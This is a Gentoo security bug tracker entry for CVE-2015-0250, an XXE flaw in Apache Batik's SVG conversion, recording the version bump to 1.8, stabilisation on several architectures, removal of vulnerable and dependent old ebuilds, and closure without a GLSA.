Summary: | <dev-java/batik-1.8: incorrect SVG file handling (CVE-2015-0250) | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | minor | CC: | java |
Priority: | Normal | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | https://bugzilla.redhat.com/show_bug.cgi?id=1203762 | ||
Whiteboard: | B3 [noglsa] | ||
Package list: | Runtime testing required: | --- | |
Bug Depends on: | 551952, 551964, 553370 | ||
Bug Blocks: |
Description
Agostino Sarubbo
2015-03-20 08:50:00 UTC
CVE-2015-0250 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0250): XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file. As per URL: Fixed in Batik 1.8 Ping on Ebuild for this. Has been around for some time. +*batik-1.8 (07 Jun 2015) + + 07 Jun 2015; Patrice Clement <monsieurp@gentoo.org> +batik-1.8.ebuild: + Version bump. Fix security bug 543858. + Please stabilise this package ASAP for the following platforms: - amd64 - ppc - ppc64 - x86 =dev-java/batik-1.8 Stable target: amd64 ppc ppc64 x86 amd64 stable x86 stable ping @ppc @ppc64 ppc stable ppc64 stable. Maintainer(s), please cleanup. Security, please vote. + 22 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -batik-1.7-r3.ebuild: + Remove vulnerable version. Fix security bug 551952. + I did remove batik-1.7 but we have the following ebuilds relying on it: app-misc/freemind/freemind-1.0.1.ebuild dev-java/fop/fop-1.1.ebuild dev-java/jcharts/jcharts-0.7.5-r2.ebuild Sorry, we can't clean it up just yet. I've revbumped batik-1.8 and stabilised it while at it cause of a new dep on xmlgraphics-common:2.0 (see bug 553370). +*batik-1.8-r1 (27 Jun 2015) + + 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> +batik-1.8-r1.ebuild: + xmlgraphics-common dependency bump from :1.5 to :2. + Dependencies clean up: + 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -freemind-0.9.0-r1.ebuild, + -freemind-1.0.0-r1.ebuild, -freemind-1.0.1.ebuild: + Remove old. + + 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -fop-0.95.ebuild, + -fop-1.1.ebuild: + Remove old. + + 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> + -files/xmlgraphics-commons-1.5-disable-iccprofile-test.patch, + -xmlgraphics-commons-1.2-r1.ebuild, -xmlgraphics-commons-1.3.1.ebuild, + -xmlgraphics-commons-1.5.ebuild: + Remove old. + Vulnerable version clean up: + 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -batik-1.7-r3.ebuild, + -batik-1.8.ebuild, batik-1.8-r1.ebuild: + Remove vulnerable version. Fix security bug 543858. + Clean up done. Security, please vote. I missed this bit in my last comment: + 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -jcharts-0.7.5-r2.ebuild: + Remove old. + GLSA Vote: No GLSA Vote: No Thank you all. Closing as noglsa. |